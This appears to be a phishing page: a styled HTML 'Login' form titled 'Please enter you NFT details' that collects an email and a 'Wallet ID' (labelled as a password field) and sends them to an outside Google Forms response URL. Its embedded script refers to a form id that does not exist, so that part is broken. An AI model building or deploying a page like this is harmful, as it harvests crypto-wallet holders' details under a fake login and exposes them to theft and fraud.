<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>My Web Page</title>
    <style>
    @import url('https://fonts.googleapis.com/css?family=Open+Sans&display=swap');

body {
  font-family: 'Open Sans', sans-serif;
  background: #f9faff;
  color: #3a3c47;
  line-height: 1.6;
  display: flex;
  flex-direction: column;
  align-items: center;
  margin: 0;
  padding: 0;
}

h1 {
  margin-top: 48px;
}

form {
  background: #fff;
  max-width: 360px;
  width: 100%;
  padding: 58px 44px;
  border: 1px solid #e1e2f0;
  border-radius: 4px;
  box-shadow: 0 0 5px 0 rgba(42, 45, 48, 0.12);
  transition: all 0.3s ease;
}

.row {
  display: flex;
  flex-direction: column;
  margin-bottom: 20px;
}

.row label {
  font-size: 13px;
  color: #8086a9;
}

.row input {
  flex: 1;
  padding: 13px;
  border: 1px solid #d6d8e6;
  border-radius: 4px;
  font-size: 16px;
  transition: all 0.2s ease-out;
}

.row input:focus {
  outline: none;
  box-shadow: inset 2px 2px 5px 0 rgba(42, 45, 48, 0.12);
}

.row input::placeholder {
  color: #C8CDDF;
}

button {
  width: 100%;
  padding: 12px;
  font-size: 18px;
  background-color: #ffcc00;
  color: #fff;
  border: none;
  border-radius: 100px;
  cursor: pointer;
  font-family: 'Open Sans', sans-serif;
  margin-top: 15px;
  transition: background 0.2s ease-out;
}

button:hover {
    background-color: #ffeb3b;
}

@media(max-width: 458px) {
  
  body {
    margin: 0 18px;
  }
  
  form {
    background: #f9faff;
    border: none;
    box-shadow: none;
    padding: 20px 0;
  }

}
    </style>
</head>
<body>
   
      <h1>Please enter you NFT details</h1>
      <form action="https://docs.google.com/forms/u/1/d/e/1FAIpQLSeOzlpQSShW6NPRlALaAbWz3KyQJpfq72DvYr7krTk6uNgrLw/formResponse">
        <div class="row">
            <label for="email">Email</label>
            <input type="email" name="entry.326112838" autocomplete="off" placeholder="email@example.com" required>
        </div>
        <div class="row">
            <label for="password">Wallet ID</label>
            <input type="text" name="entry.752096047" required>
        </div>
        <button type="submit">Login</button>
      </form>
      <script>
        document.getElementById("loginForm").addEventListener("submit", function(e) {
          e.preventDefault(); 
        });
        </script>
        
</body>
</html>
